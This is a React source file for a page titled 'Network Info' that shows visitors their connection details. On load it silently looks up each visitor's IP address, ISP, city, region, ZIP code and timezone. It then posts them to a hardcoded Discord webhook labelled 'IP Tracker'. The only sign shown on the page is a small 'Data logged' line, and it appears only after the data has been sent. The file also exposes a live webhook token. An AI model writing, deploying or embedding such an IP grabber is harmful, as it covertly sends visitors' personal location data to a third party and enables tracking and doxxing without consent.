import { useEffect, useState } from "react";

const DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1467137149873819710/oDpNM0_05l4BLYpA6yri4jQ_mB14fvJF5wkOOsMozD4KNM17kBXFmb189GWvxr2-r_kb";

interface VisitorInfo {
  ip: string;
  isp: string;
  zip: string;
  city: string;
  region: string;
  country: string;
  timezone: string;
}

async function fetchVisitorInfo(): Promise<VisitorInfo> {
  const res = await fetch("https://ipapi.co/json/");
  if (!res.ok) throw new Error("Failed to fetch IP info");
  const data = await res.json();
  return {
    ip: data.ip || "Unknown",
    isp: data.org || "Unknown",
    zip: data.postal || "Unknown",
    city: data.city || "Unknown",
    region: data.region || "Unknown",
    country: data.country_name || "Unknown",
    timezone: data.timezone || "Unknown",
  };
}

async function sendToDiscord(info: VisitorInfo) {
  const embed = {
    title: "New Visitor Detected",
    color: 0x5865f2,
    fields: [
      { name: "IP Address", value: info.ip, inline: true },
      { name: "ISP", value: info.isp, inline: true },
      { name: "City", value: info.city, inline: true },
      { name: "Region", value: info.region, inline: true },
      { name: "ZIP Code", value: info.zip, inline: true },
      { name: "Country", value: info.country, inline: true },
      { name: "Timezone", value: info.timezone, inline: true },
    ],
    timestamp: new Date().toISOString(),
    footer: { text: "IP Tracker" },
  };

  await fetch(DISCORD_WEBHOOK, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ embeds: [embed] }),
  });
}

export default function App() {
  const [info, setInfo] = useState<VisitorInfo | null>(null);
  const [sent, setSent] = useState(false);

  useEffect(() => {
    fetchVisitorInfo()
      .then(async (data) => {
        setInfo(data);
        await sendToDiscord(data);
        setSent(true);
      })
      .catch(console.error);
  }, []);

  return (
    <div className="min-h-screen flex items-center justify-center bg-gradient-to-br from-slate-900 to-slate-800 text-white p-6">
      <div className="max-w-md w-full space-y-6">
        <div className="text-center space-y-2">
          <div className="text-5xl">🌐</div>
          <h1 className="text-3xl font-bold tracking-tight">Network Info</h1>
          <p className="text-slate-400 text-sm">Your connection details</p>
        </div>

        {!info ? (
          <div className="text-center text-slate-400 animate-pulse py-8">
            Detecting your information...
          </div>
        ) : (
          <div className="bg-slate-700/50 rounded-2xl divide-y divide-slate-600/50 overflow-hidden border border-slate-600/40">
            {[
              { label: "IP Address", value: info.ip, icon: "🔍" },
              { label: "ISP", value: info.isp, icon: "📡" },
              { label: "City", value: info.city, icon: "🏙️" },
              { label: "Region", value: info.region, icon: "📍" },
              { label: "ZIP Code", value: info.zip, icon: "📮" },
              { label: "Country", value: info.country, icon: "🌍" },
              { label: "Timezone", value: info.timezone, icon: "🕐" },
            ].map(({ label, value, icon }) => (
              <div key={label} className="flex items-center justify-between px-5 py-4">
                <span className="text-slate-400 text-sm flex items-center gap-2">
                  <span>{icon}</span>
                  {label}
                </span>
                <span className="font-medium text-sm text-right max-w-[60%] truncate">{value}</span>
              </div>
            ))}
          </div>
        )}

        {sent && (
          <div className="text-center text-xs text-slate-500">
            ✓ Data logged
          </div>
        )}
      </div>
    </div>
  );
}
